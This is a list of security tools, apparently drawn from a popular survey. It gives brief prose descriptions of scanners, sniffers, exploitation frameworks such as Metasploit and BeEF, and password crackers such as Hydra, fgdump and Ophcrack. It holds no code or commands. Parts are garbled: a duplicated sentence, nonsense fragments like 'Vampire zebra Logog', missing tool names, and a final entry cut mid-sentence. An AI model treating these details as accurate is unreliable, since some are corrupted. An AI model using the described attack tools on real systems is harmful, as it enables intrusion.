Wireshark
(known as Ethereal until a trademark dispute in summer 2006) is a fantastic
open source multi-platform network protocol analyzer. It allows you to examine
data from a live network or from a capture file on disk. You can interactively
browse the capture data, delving down into just the level of packet detail you
need.
Metasploit
Metasploit took the security world by storm when
it was released in 2004. It is an advanced open-source platform for developing,
testing, and using exploit code. The extensible model through which payloads,
encoders, no-op generators, and exploits can be integrated has made it possible
to use the Metasploit Framework as an outlet for cutting-edge exploitation
research.
Nessus
Nessus is one of the most popular and capable
vulnerability scanners, particularly for UNIX systems. It was initially free
and open source...
when released but not now. which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.
when released but not now. which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.
Aircrack is a suite of tools for 802.11a/b/g WEP
and WPA cracking. It implements the best known cracking algorithms to recover
wireless keys once enough encrypted packets have been gathered. . The suite
comprises over a dozen discrete tools, including airodump (an 802.11 packet capture
program), aireplay (an 802.11 packet injection program), aircrack (static WEP
and WPA-PSK cracking), and airdecap
Snort
This network intrusion detection and prevention
system excels at traffic analysis and packet logging on IP networks. Through
protocol analysis, content searching, and various pre-processors, Snort detects
thousands of worms, vulnerability exploit attempts, port scans, and other
suspicious behavior.
Cain and Abel
UNIX users often smugly assert that the best free
security tools support their platform first, and Windows ports are often an
afterthought. They are usually right, but Cain & Abel is a glaring
exception. This Windows-only password recovery tool handles an enormous variety
of tasks. It can recover passwords by sniffing the network, cracking encrypted
passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, revealing password boxes,
uncovering cached passwords and analyzing routing protocols
BackTrack
This excellent bootable live CD Linux
distribution comes from the merger of Whax and Auditor. It boasts a huge
variety of Security and Forensics tools and provides a rich development
environment. User modularity is emphasized so the distribution can be easily
customized by the user to include personal scripts, additional tools,
customized kernels, etc. BackTrack is succeeded by Kali Linux
Netcat
The original Netcat was released by Hobbit in 1995, This simple utility reads and
writes data across TCP or UDP network connections. It is designed to be a
reliable back-end tool to use directly or easily drive by other programs and
scripts. At the same time, it is a feature-rich network debugging and
exploration tool, since it can create almost any kind of connection you would
need, including port binding to accept
tcpdump
Tcpdump is the network sniffer we all used before
wireshark came on the scene, and many of us continue to use it frequently. It
may not have the bells and whistles (such as a pretty GUI and parsing logic for
hundreds of application protocols) that Wireshark has, but it does the job well
and with fewer security risks. It also requires fewer system resources.
John the Ripper
John the Ripper is a fast password cracker for
UNIX/Linux and Mac OS X... Its primary purpose is to detect weak UNIX
passwords, though it supports hashes for many other platforms as well. There is
an official free version, a community-enhanced version (with many contributed
patches but not as much quality assurance), and an inexpensive pro version.
Kismet
Kismet is a console (ncurses) based 802.11
layer-2 wireless network detector, sniffer, and intrusion detection system. It
identifies networks by passively sniffing (as opposed to more active tools such
a Netstumbler), and can even decloak hidden (non-beaconing) networks if they
are in use. It can automatically detect network IP blocks by sniffing TCP, UDP,
ARP, and DHCP packets, log traffic
OpenSSH/PuTTY/SSH
SSH (Secure Shell) is the now ubiquitous program
for logging into or executing commands on a remote machine. It provides secure
encrypted communications between two untrusted hosts over an insecure network,
replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX
users run the open source server
and client. Windows users often prefer the free putty client, which is also available
for many mobile devices.
Burp Suite
Burp Suite is an integrated platform for
attacking web applications. It contains a variety of tools with numerous
interfaces between them designed to facilitate and speed up the process of
attacking an application. All of the tools share the same framework for
handling and displaying HTTP messages, persistence, authentication, proxies,
logging, alerting and extensibility.
Nikto
Nikto is an Open Source (GPL) web server scanner
which performs comprehensive tests against web servers for multiple items,
including over 6400 potentially dangerous files/CGIs, checks for outdated
versions of over 1200 servers, and version specific problems on over 270
servers. It also checks for server configuration items such as the presence of
multiple index files, HTTP server options, and will attempt to identify
installed web servers and software. Scan items and plugins are frequently
updated and can be automatically updated.
Hping
This handy little utility assembles and sends
custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired
by the ping command, but offers far more control over the probes sent. It also
has a handy traceroute mode and supports IP fragmentation. Hping is
particularly useful when trying to traceroute/ping/probe hosts behind a
firewall that blocks attempts using the standard utilities. This often allows
you to map out firewall rule sets. It is also great for learning more about
TCP/IP and experimenting with IP protocols. Unfortunately, it hasn't been
updated since 2005. The Nmap Project created and maintains NPING.
Ettercap
Ettercap is a suite for man in the middle attacks
on LAN. It features sniffing of live connections, content filtering on the fly
and many other interesting tricks. It supports active and passive dissection of
many protocols (even ciphered ones) and includes many feature for network and
host analysis.
Sysinternals
Sysinternals provides many small windows
utilities that are quite useful for low-level windows hacking. Some are free of
cost and/or include source code, while others are proprietary. Survey
respondents were most enamored with:
- ProcessExplorer for keeping an eye on the files and directories open by any process (like lsof on UNIX).
- PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
- Autoruns for discovering what executables are set to run during system boot up or login.
- RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
- TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
W3AF
W3af is an extremely popular, powerful, and
flexible framework for finding and exploiting web application vulnerabilities.
It is easy to use and extend and features dozens of web assessment and
exploitation plugins. In some ways it is like a web.
OpenVAS
OpenVAS is a vulnerability scanner that was
forked from the last free version of NESSUS after
that tool went proprietary in 2005. OpenVAS plugins are still written in the
Nessus NASL language. The project seemed dead for a while, but development has
restarted.
Scapy
Scapy is a powerful interactive packet
manipulation tool, packet generator, network scanner, network discovery tool,
and packet sniffer. Note that Scapy is a very low-level tool—you interact with
it using the Python programming language. It provides classes to interactively
create packets or sets of packets, manipulate them, send them over the wire,
sniff other packets from the wire, match answers and replies.
Ping/telnet/dig/traceroute/whois/netstat
While there are many advanced high-tech tools out
there to assist in security auditing, don't forget about the basics! Everyone
should be very familiar with these tools as they come with most operating
systems (except that Windows omits whois and uses the name tracert). They can
be very handy in a pinch, although more advanced functionality is available
from Hping and NetCAt
THC Hydra
When you need to brute
force crack a remote authentication service, Hydra is often the tool of choice.
It can perform rapid dictionary attacks against more then 30 protocols,
including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amcap his release is from the fine
folks at THC
Perl/Python/Ruby
While many canned security tools are available on
this site for handling common tasks, scripting languages allow you to write
your own (or modify existing ones) when you need something more custom. Quick,
portable scripts can test, exploit, or even fix systems. Archives like CPAN are
filled with modules such as Net::RAWIP and protocol implementations to make
your tasks even easier. Many security tools use scripting languages heavily for
extensibility
Paros proxy
A Java-based web proxy for assessing web
application vulnerability. It supports editing/viewing HTTP/HTTPS messages
on-the-fly to change items such as cookies and form fields. It includes a web
traffic recorder, web spider, hash calculator, and a scanner for testing common
web application attacks such as SQL injection and cross-site scripting
NetStumbler
Netstumbler is the best known Windows tool for
finding open wireless access points ("wardriving"). They also
distribute a WinCE version for PDAs and such named MINI Stumbler.
The tool is currently free but Windows-only and no source code is provided. It
uses a more active approach to finding WAPs than passive sniffers such as
Kismet or Kismac.
While
it is far more than a security tool, Google's massive database is a gold mine
for security researchers and penetration testers. You can use it to dig up
information about a target company by using directives such as “site: target-domain.com”
and find employee names, sensitive information that they wrongly thought was
hidden, vulnerable software installations, and more. Similarly, when a bug is
found in yet another popular webapp, Google can often provide a list of
vulnerable servers worldwide within seconds. Check out the GOOGLER HACKING
DATABASE and Johnny Long's excellent book:
OSSEC
HIDS performs log analysis, integrity checking, rootkit detection, time-based
alerting and active response. In addition to its IDS functionality, it is
commonly used as a SEM/SIM solution. Because of its powerful log analysis
engine, ISPs, universities and data centers are running OSSEC HIDS to monitor
and analyze their firewalls, IDSs, web servers and authentication logs.
In
its simplest form, WebScarab records the conversations (requests and responses)
that it observes, and allows the operator to review them in various ways.
WebScarab is designed to be a tool for anyone who needs to expose the workings
of an HTTP(S) based application, whether to allow the developer to debug
otherwise difficult problems, or to allow a security specialist to identify
vulnerabilities in the way that the application has been designed or
implemented
Core
Impact isn't cheap (be prepared to spend at least $30,000), but it is widely
considered to be the most powerful exploitation tool available. It sports a
large, regularly updated database of professional exploits, and can do neat
tricks like exploiting one machine and then establishing an encrypted tunnel
through that machine to reach and exploit other boxes.
sqlmap
is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of back-end
database servers. It comes with a broad range of features, from database
fingerprinting to fetching data from the DB and even accessing the underlying
file system and executing OS commands via out-of-band connections.
TrueCrypt
is an excellent open source disk encryption system for Windows, Mac, and Linux
systems. Users can encrypt entire file systems, which are then on-the-fly
encrypted/decrypted as needed without user intervention beyond initially
entering their passphrase. A clever hidden volume feature allows you
to hide a second layer of particularly sensitive content with plausible
deniability about whether it even exists.
This
popular and well-engineered suite by Dug Song includes many tools: dsniff,
filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a
network for interesting data (passwords, e-mail, files, etc.); arpspoof, dnsspoof,
and macof facilitate the interception of network traffic normally unavailable
to an attacker (e.g, due to layer-2 switching); and sshmitm and webmitm
implement active monkey-in-the-middle attacks against redirected ssh and https
sessions by exploiting weak bindings in ad-hoc PKI.
Disassembly
is a big part of security research. It will help you dissect that Microsoft
patch to discover the silently fixed bugs they don't tell you about, or more
closely examine a server binary to determine why your exploit isn't working.
Many debuggers are available, but IDA Pro has become the de-facto standard for
the analysis of hostile code and vulnerability research. This interactive,
programmable, extensible, multi-processor disassembler has a graphical
interface on Windows and console interfaces on Linux
Maltego
is a forensics and data mining application. It is capable of querying various
public data sources and graphically depicting the relationships between
entities such as people, companies, web sites, and documents
Ophcrack
is a free rainbow-table based cracker for Windows passwords (though the tool
itself runs on Linux, Windows, and Mac). Features include LM and NTLM hash
cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a
Windows partition, and a Live CD version.
Rapid7
Nexpose is a vulnerability scanner which aims to support the entire
vulnerability management lifecycle, including discovery, detection,
verification, risk classification, impact analysis, reporting and mitigation.
It integrates with Rapid7's Metasploit for vulnerability exploitation. It
is sold as standalone software, an appliance, virtual machine, or as a managed
service or private cloud deployment. User interaction is through a web browser.
Netfilter
is a powerful packet filter implemented in the standard Linux kernel. The
userspace iptables tool is used for configuration. It now supports packet filtering
(stateless or stateful), all kinds of network address and port translation
(NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many
different modules for handling unruly protocols such as FTP.
PGP
is the famous encryption system originally written by Phil Zimmerman which
helps secure your data from eavesdroppers and other risks. GnuPG is a very
well-regarded open source implementation of the PGP standard (the actual
executable is named gpg). While the excellent GnuPG is always free, PGP is now
owned by Symantec and costs a lot of money.
skipfish is an active web application security
reconnaissance tool. It prepares an interactive sitemap for the targeted site
by carrying out a recursive crawl and dictionary-based probes. The resulting
map is then annotated with the output from a number of active (but hopefully
non-disruptive) security checks. The final report generated by the tool is
meant to serve as a foundation for professional web application security
assessments.
GFI
LanGuard is a network security and vulnerability scanner designed to help with
patch management, network and software audits, and vulnerability assessments.
The price is based on the number of IP addresses you wish to scan. A free trial
version (up to 5 IP addresses) is available
Acunetix
WVS (web vulnerability scanner) automatically checks web applications for
vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion,
and weak password strength on authentication pages. It boasts a comfortable
GUI, an ability to create professional security audit and compliance reports,
and tools for advanced manual webapp testing
QualysGuard
is a popular SaaS (software as a service) vulnerability management offering.
It's web-based UI offers network discovery and mapping, asset prioritization,
vulnerability assessment reporting and remediation tracking according to
business risk. Internal scans are handled by Qualys appliances which
communicate back to the cloud-based system
VMware
virtualization software lets you run one operating system within another. This
is quite useful for security researchers who commonly need to test code,
exploits, etc on multiple platforms. It only runs on Windows and Linux as the
host OS, but pretty much any x86 or x86_64 OS will run inside the virtualized
environment. It is also useful for setting up sandboxes. You can browse from
within a VMware window so the even if you are infected with malware, it cannot
reach your host OS. And recovering the guest OS is as simple as loading a "snapshot"
from prior to the infection. VM Player (executes, but can't create OS
images) and VMWare server (partitions a physical server machine into
multiple virtual machines) were recently released for free.
OllyDbg
is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis
on binary code analysis makes it particularly useful in cases where source is
unavailable. OllyDbg features an intuitive user interface, advanced code analysis
capable of recognizing procedures, loops, API calls, switches, tables,
constants and strings, an ability to attach to a running program, and good
multi-thread support. OllyDbg is free to download and use but no source code is
provided
Ntop
shows network usage in a way similar to what top does for processes. In
interactive mode, it displays the network status on the user's terminal. In Web
mode, it acts as a Web server, creating an HTML dump of the network status. It
sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for
creating ntop-centric monitoring applications, and RRD for persistently storing
traffic statistics
Microsoft
Baseline Security Analyzer (MBSA) is an easy-to-use tool designed for the IT
professional that helps small and medium-sized businesses determine their
security state in accordance with Microsoft security recommendations and offers
specific remediation guidance. Built on the Windows Update Agent and Microsoft
Update infrastructure, MBSA ensures consistency with other Microsoft management
products including Microsoft Update (MU), Windows Server Update Services
(WSUS), Systems Management Server (SMS) and Microsoft Operations Manager (MOM).
Apparently MBSA on average scans over 3 million computers each week.
AppScan
provides security testing throughout the application development lifecycle,
easing unit testing and security assurance early in the development phase.
Appscan scans for many common vulnerabilities, such as cross site scripting,
HTTP response splitting, parameter tampering, hidden field manipulation,
backdoors/debug options, buffer overflows and more. AppScan was merged into
IBM's Rational division after IBM purchased its original developer (Watchfire)
in 2007.
Alienvault
OSSIM stands for Open Source Security Information Management. Its goal is to
provide a comprehensive compilation of tools which, when working together,
grant network/security administrators with a detailed view over each and every
aspect of networks, hosts, physical access devices, and servers.
Medusa
is intended to be a speedy, massively parallel, modular, login brute-forcer. It
supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion,
and VNC to name a few. Other online crackers are THC Hydra and Ncrack
The
OpenSSL Project is a collaborative effort to develop a robust, commercial-grade,
full-featured, and open source toolkit implementing the Secure Sockets Layer
(SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a
full-strength general purpose cryptography library. Apart from being a
component of many crypto programs, OpenSSL comes with a lot of command-line
tools for encryption, hashing, certificate handling, and more
Canvas
is a commercial vulnerability exploitation tool from Dave Aitel's ImmunitySec. It includes more than 370 exploits and is less expensive
than Core
Impact or the commercial versions
of Metasploit. It comes with full source code, and occasionally even
includes zero-day exploits.
fgdump
is a newer version of the pwdump tool for extracting NTLM and LanMan password hashes
from Windows. It is also capable of displaying password histories if they are
available. It outputs the data in L0phtCrack-compatible form, and can write to an output file. fgdump
attempts to disable antivirus software before running. It then runs pwdump,
cachedump (cached credentials dump), and pstgdump (protected storage
dump).
Tor
is a network of virtual tunnels designed to improve privacy and security on the
Internet by routing your requests through a series of intermediate machines. It
uses a normal proxy server interface so that ordinary Internet applications
like web browsers and chat programs can be configured to use it. In addition to
helping preserve users' anonymity, Tor can help evade firewall restrictions.
Tor's hidden services allow users publish web sites and other services without
revealing their identity or location. For a free cross-platform GUI, users
recommend VIdalia. Remember that Tor exit nodes are sometimes run by malicious
parties and can Sniff your traffic, so avoid authenticating using insecure
network protocols (such as non-SSL web sites and mail servers). That is always
dangerous, but particularly bad when routing through Tor
Like Nessus, Retina's function is to scan all the hosts on a network
and report on any vulnerabilities found. It was written by eEye, who are
well known for their Security research.
Firefox
is a web browser, a descendant of Mozilla. It emerged as a serious competitor
to Internet Explorer, with improved security as one of its features. While
Firefox no longer has a stellar security record, security professionals still
appreciate it for its wide selection of security-related add-ons,
including Temper data , firebug, Noscript.
OpenVPN
is an open-source SSL VPN package which can accommodate a wide range of
configurations, including remote access, site-to-site VPNs, WiFi security, and
enterprise-scale remote access solutions with load balancing, failover, and
fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure
network extension using the industry standard SSL/TLS protocol, supports
flexible client authentication methods based on certificates, smart cards,
and/or 2-factor authentication, and allows user or group-specific access
control policies using firewall rules applied to the VPN virtual interface
L0phtCrack
attempts to crack Windows passwords from hashes which it can obtain (given
proper access) from stand-alone Windows workstations, networked servers,
primary domain controllers, or Active Directory. In some cases it can sniff the
hashes off the wire. It also has numerous methods of generating password
guesses (dictionary, brute force, etc).
The
Social Engineer Toolkit incorporates many useful social-engineering attacks all
in one interface. The main purpose of SET is to automate and improve on many of
the social-engineering attacks out there. It can automatically generate
exploit-hiding web pages or email messages, and can use Metasploit payloads to,
for example, connect back with a shell once the page is opened.
Yersinia
is a low-level protocol attack tool useful for penetration testing. It is
capable of many diverse attacks over multiple protocols, such as becoming the
root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP
(Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot
Standby Router Protocol) scenario, faking DHCP replies, and other low-level
attacks.
Fiddler
is a Web Debugging Proxy which logs all HTTP(S) traffic between your computer
and the Internet. Fiddler allows you to inspect all HTTP(S) traffic, set
breakpoints, and "fiddle" with incoming or outgoing data. Fiddler
includes a powerful event-based scripting subsystem, and can be extended using
any .NET language.
sslstrip
is an SSL stripping proxy, designed to make unencrypted HTTP sessions look as
much as possible like HTTPS sessions. It converts https links to http or to
https with a known private key. It even provides a padlock favicon for the
illusion of a secure channel. Many HTTPS sites are normally accessed from a
redirect on an HTTP page, and many users don't notice when their connection
isn't upgraded.
SolarWinds
has created and sells dozens of special-purpose tools targeted at systems
administrators. Security-related tools include many network discovery scanners,
an SNMP brute-force cracker, router password decryption, a TCP connection reset
program, one of the fastest and easiest router config download/upload applications
available and more.
ngrep
strives to provide most of GNU grep's common features, applying them to the
network layer. ngrep is a pcap-aware tool that will allow you to specify
extended regular or hexadecimal expressions to match against data payloads of
packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP,
FDDI, Token Ring and null interfaces, and understands bpf filter logic in the
same fashion as more common packet sniffing tools, such as tcpdump and snoop
Featuring
link layer, IP, and TCP modes, EtherApe displays network activity graphically
with a color coded protocols display. Hosts and links change in size with
traffic. It supports Ethernet, WLAN, FDDI, Token Ring, ISDN, PPP and SLIP
devices. It can filter traffic to be shown, and can read traffic from a file as
well as live from the network
Splunk
is a tool to search, report, monitor and analyze real-time streaming and
historical IT data. It collects logs from a variety of sources and makes them
searchable in a unified interface.
Angry
IP Scanner is a small open source Java application which performs host
discovery ("ping scan") and port scans. The old 2.x release was
Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as
Java is installed. Version 3.X omits the Vampire zebra Logog.
NetWitness
NextGen is a network security monitor. The heart of the monitor is the decoder
subsystem that records network traffic for analysis. The investigator
is a protocol analyzer meant to be run on captured traffic.
Secunia
PSI (Personal Software Inspector) is a free security tool designed to detect
vulnerable and out-dated programs and plug-ins that expose your PC to attacks.
Attacks exploiting vulnerable programs and plug-ins are rarely blocked by
traditional anti-virus programs.
Nagios
is a system and network monitoring application. It watches hosts and services
that you specify, alerting you when things go bad and when they get better.
Some of its many features include monitoring of network services (SMTP, POP3,
HTTP, NNTP, ICMP, etc.), monitoring of host resources (processor load, disk
usage, etc.), and contact notifications when service or host problems occur and
get resolved (via email, pager, or user-defined method).
Immunity
Debugger is a debugger whose design reflects the need to write exploits,
analyze malware, and reverse engineer binary files. It builds on a solid user
interface with function graphing, the industry's first heap analysis tool built
specifically for heap creation, and a large and well supported Python API for
easy extensibility
Superscan
is a free Windows-only closed-source TCP/UDP port scanner by Foundstone (now
part of McAfee). It includes a variety of additional networking tools such as
ping, traceroute, HTTP HEAD, and whois. Some functionality has been crippled by
restrictions imposed by Microsoft in Windows XP SP2 and newer releases. This
tool is not really maintained (the latest release was in 2004
sqlininja
exploits web applications that use Microsoft SQL Server as a database backend.
Its focus is on getting a running shell on the remote host. sqlninja doesn't
find an SQL injection in the first place, but automates the exploitation
process once one has been discovered.
Helix
is a Ubuntu live CD customized for computer forensics. Helix has been designed
very carefully to not touch the host computer in any way and
it is forensically sound. Helix will not auto mount swap space, or auto mount
any attached devices. Helix also has a special Windows autorun side for
Incident Response and Forensics.
Malwarebytes'
Anti-Malware is a malware scanner for Windows. The authors claim to use a
variety of technologies to find malware undetectable by other malware scanners.
There is a free trial with limited options and a supported full version with
the ability to run scheduled scans.
Netsparker
is a web application security scanner, with support for both detection and
exploitation of vulnerabilities. It aims to be false positive–free by only
reporting confirmed vulnerabilities after successfully exploiting or otherwise
testing them.
WebInspect
is a web application security assessment tool that helps identify known and
unknown vulnerabilities within the Web application layer. It can also help
check that a Web server is configured properly, and attempts common web attacks
such as parameter injection, cross-site scripting, directory traversal, and
more. It was produced by Spidynamics, which is now part of HP
BeEF
is a browser exploitation framework. This tool will demonstrate the collecting
of zombie browsers and browser vulnerabilities in real-time. It provides a
command and control interface which facilitates the targeting of individual or
groups of zombie browsers. It is designed to make the creation of new exploit
modules easy.
Argus
is a fixed-model Real Time Flow Monitor designed to track and report on the
status and performance of all network transactions seen in a data network
traffic stream. Argus provides a common data format for reporting flow metrics
such as connectivity, capacity, demand, loss, delay, and jitter on a per
transaction basis. The record format that Argus uses is flexible and
extensible, supporting generic flow identifiers and metrics, as well as
application/protocol specific information.
Like Netfilter
and ipfilter on other platforms, OpenBSD users love PF, their firewall
tool. It handles network address translation, normalizing TCP/IP traffic,
providing bandwidth control, and packet prioritization. It also offers some
eccentric features, such as passive OS detection. Coming from the same guys who
created OpenBSD, you can trust that it has been well audited and coded to avoid
the sort of security holes
ClamAV
is a powerful AntiVirus scanner focused towards integration with mail servers
for attachment scanning. It provides a flexible and scalable multi-threaded
daemon, a command line scanner, and a tool for automatic updating via the
Internet. Clam AntiVirus is based on a shared library distributed with the Clam
AntiVirus package, which you can use with your own software. Most importantly,
the virus database is kept up to date
Nipper
(short for Network Infrastructure Parser, previously known as CiscoParse)
audits the security of network devices such as switches, routers, and
firewalls. It works by parsing and analyzing device configuration file which
the Nipper user must supply. This was an open source tool until its developer
(Titania) released a commercial version and tried to hide their old GPL
releases
NetworkMiner
is a Network Forensic Analysis Tool for Windows. NetworkMiner can be used as a
passive network sniffer/packet capturing tool in order to detect operating
systems, sessions, hostnames, open ports etc. without putting any traffic on
the network. NetworkMiner can also parse pcap files for off-line analysis and
to regenerate/reassemble transmitted files and certificates from pcap files
Wikto
is a tool that checks for flaws in webservers. It provides much the same
functionality as NIkto but adds various interesting pieces of
functionality, such as a Back-End miner and close Google integration.
Wikto is written for the MS .NET environment and registration is required to
download the binary and/or source code
P0f
is able to identify the operating system of a target host simply by examining
captured packets even when the device in question is behind an overzealous
packet firewall. P0f does not generate ANY additional network traffic, direct or
indirect. No name lookups, no mysterious probes, no ARIN queries, nothing. In
the hands of advanced users, P0f can detect firewall presence, NAT use,
existence of load balancers, and more!
NoScript
is an add-on for Firefox that blocks JavaScript, Java, Flash, and other plugin
content (allowing you to selectively re-enable them for certain sites). It also
offers cross-site scripting protection. This is mainly designed to keep web
users safe, but security testers can also use the add-on to see what scripts a
site is using. One caution is that the NoScript author Giorgio Maone has been
caught inserting hidden code into NoScript which disabled users' ad-blocking
software so that ads would still show up on the NoScript web site
Sguil
(pronounced sgweel) is built by network security analysts for network security
analysts. Sguil's main component is an intuitive GUI that provides access to realtime
events, session data, and raw packet captures. Sguil facilitates the practice
of Network Security Monitoring and event driven analysis
The
Samurai Web Testing Framework is a live linux environment that has been
pre-configured to function as a web pen-testing environment. The CD contains
the best of the open source and free tools that focus on testing and attacking
websites. Samurai includes many other tools featured in this list
Tamper
Data is an add-on for Firefox that lets you view and modify HTTP
requests before they are sent. It shows what information the web browser is
sending on your behalf, such as cookies and hidden form fields. Use of this
plugin can reveal web applications that trust the client not to
misbehave.
Firebug
is an add-on for firefox that provides access to browser internals.
It features live editing of HTML and CSS, a DOM viewer, and a JavaScript
debugger. Web application security testers appreciate the ability to see what's
happening behind the scenes of the browser.
inSSIDer
is a wireless network scanner for Windows, OS X, and Android. It was designed
to overcome limitations of Netstumbler, namely not working well on 64-bit
Windows and Windows Vista. inSSIDer can find open wireless access points, track
signal strength over time, and save logs with GPS records
The
Nemesis Project is designed to be a command line-based, portable human IP stack
for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and
should allow for useful scripting of injected packet streams from simple shell
scripts. If you enjoy Nemesis, you might also want to look at Hping as
they complement each other well.
KeePass
is a password manager. It stores many passwords which are unlocked by one
master password. The idea is to only have to remember one high-quality
password, and still be able to use unique passwords for various accounts. It
has a feature to automatically fill in passwords in web forms.
GDB
is the GNU Project's debugger. Security folks use it to analyze unknown
binaries, by getting disassemblies and stepping through a program instruction
by instruction. GDB can debug programs written in Ada, C, C++, Objective-C,
Pascal, and other languages
VirusTotal
is a web service that analyzes submitted files for known viruses and other
malware. It incorporates dozens of antivirus engines from different vendors,
updated regularly with new signatures. Participating antivirus vendors can get
alerts when a file is not detected by their product but is by someone else's
A
file and directory integrity checker. Tripwire is a tool that aids system
administrators and users in monitoring a designated set of files for any
changes. Used with system files on a regular (e.g., daily) basis, Tripwire can
notify system administrators of corrupted or tampered files, so damage control
measures can be taken in a timely manner. Traditionally an open souce tool,
Tripwire Corp is now focused on their commercial enterprise configuration
control offerings.
Ratproxy
is a semi-automated, largely passive web application security audit tool. It is
meant to complement active crawlers and manual proxies more commonly used for
this task, and is optimized specifically for an accurate and sensitive
detection, and automatic annotation, of potential problems and
security-relevant design patterns based on the observation of existing,
user-initiated traffic in complex web 2.0 environments.
This
popular wireless stumbler for Mac OS X offers many of the features of its
namesake Kismet, though the codebase is entirely different. Unlike
console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet
was ported to OS X. It also offers mapping, Pcap-format import and logging, and
even some decryption and deauthentication attacks
ike-scan
is a command-line tool that uses the IKE protocol to discover, fingerprint and
test IPsec VPN servers. It scans IP addresses for VPN servers by sending a
specially crafted IKE packet to each host within a network. Most hosts running
IKE will respond, identifying their presence. The tool then remains silent and
monitors retransmission packets. These retransmission responses are recorded,
displayed and matched against a known set of VPN product fingerprints. ike-scan
can VPNs from manufacturers including Checkpoint, Cisco, Microsoft, Nortel, and
Watchguard
NetScanTools
is a collection of over 40 network utilities for Windows, designed with an easy
user interface in mind. It includes DNS tools, a ping and port scanner,
traceroute, and other utilities. It comes in bundles with more or fewer tools
based on the price.
curl
is a command line tool for transferring data with URL syntax, supporting FTP,
FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, FILE, IMAP,
SMTP, POP3 and RTSP. curl supports SSL certificates, HTTP POST, HTTP PUT, FTP
uploading, HTTP form based upload, proxies, cookies, authentication, and
more. libcurl provides these capabilities to other programs.
The
Sleuth Kit (previously known as TSK) is a collection of UNIX-based command line
file and volume system forensic analysis tools. The file system tools allow you
to examine file systems of a suspect computer in a non-intrusive fashion.
Because the tools do not rely on the operating system to process the file
systems, deleted and hidden content is shown. A graphical interface to the
tools called
Websecurify
is a powerful web application security testing environment designed from the
ground up to provide the best combination of automatic and manual vulnerability
testing technologies
Knoppix
consists of a representative collection of GNU/Linux software, automatic
hardware detection, and support for many graphics cards, sound cards, SCSI and
USB devices and other peripherals. Knoppix can be used as a productive Linux
system for the desktop, educational CD, rescue system, or as many Nmap survey
takers attest, a portable security tool.
Amap
is a great tool for determining what application is listening on a given port.
Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd
opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap
output files. This is yet another valuable tool from the THC.
The
RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory
trade-off. A traditional brute force cracker tries all possible plaintexts one
by one, which can be time consuming for complex passwords. RainbowCrack uses a
time-memory trade-off to do all the cracking-time computation in advance and
store the results in so-called "rainbow tables". It does take a long
time to precompute the tables but RainbowCrack can be hundreds of times faster
than a brute force cracker once the precomputation is finished.
Grendel-Scan
is an open-source web application security testing tool. It has automated
testing module for detecting common web application vulnerabilities, and
features geared at aiding manual penetration tests.
dradis
is an open source framework to enable effective sharing of information among
participants in a penetration test. It is a self-contained web application that
provides a centralised repository of information to keep track of what has been
done so far, and what is still ahead. It has plugins to read and collect the
output of a variety of network scanning tools, like Nmap, Burp Suite, and Nikto.
A
utility similar to the venerable Netcat that works over a number of protocols and through a
files, pipes, devices (terminal or modem, etc.), sockets (Unix, IP4, IP6 - raw,
UDP, TCP), a client for SOCKS4, proxy CONNECT, or SSL, etc. It provides
forking, logging, and dumping, different modes for interprocess communication,
and many more options.
DumpSec
is a security auditing program for Microsoft Windows NT/XP/200x. It dumps the
permissions (DACLs) and audit settings (SACLs) for the file system, registry,
printers and shares in a concise, readable format, so that holes in system
security are readily apparent. DumpSec also dumps user, group and replication
information.
SAINT
is a commercial vulnerability assessment tool. Like Nessus, it used to be free and open source but is now a commercial
product. Unlike Nexpose, and QualysGuard, SAINT runs on Linux and Mac OS X. In fact, SAINT is one of
the few scanner vendors that don't support (run on) Windows at all.
NBTScan
is a program for scanning IP networks for NetBIOS name information (similar to
what the Windows nbtstat tool provides against single hosts). It sends a
NetBIOS status query to each address in a supplied range and lists received
information in human readable form
DirBuster
searches for hidden pages and directories on a web server. Sometimes developers
will leave a page accessible, but unlinked; DirBuster is meant to find these
potential vulnerabilities. This is a Java application developed by OWASP.
WinDbg
is a graphical debugger from Microsoft. It is actually just one component of
the Debugging
Tools for Windows package, which also includes
the KD, CDB, and NTSD debuggers. Its claim to fame is debugging memory dumps
produced after a crash. It can even debug in kernel mode
Wfuzz
is a tool for bruteforcing Web Applications, it can be used for finding
resources not linked (directories, servlets, scripts, etc), bruteforcing GET
and POST parameters for different kinds of injections (SQL, XSS, LDAP, etc.),
bruteforcing form parameters (user/password), fuzzing, and more.
ArcSight
provides a suite of tools for SIEM—security information and event management.
The best-known seems to be ArcSight Enterprise
Security Manager (ESM),
described as the "brain" of the SIEM platform. It is a log analyzer
and correlation engine designed to sift out important network events. The ESM
itself is a standalone appliance, and the management programs run on Linux,
Windows, AIX, and Solaris.
Unicornscan
is an attempt at a User-land Distributed TCP/IP stack for information gathering
and correlation. It is intended to provide a researcher a superior interface
for introducing a stimulus into and measuring a response from a TCP/IP enabled
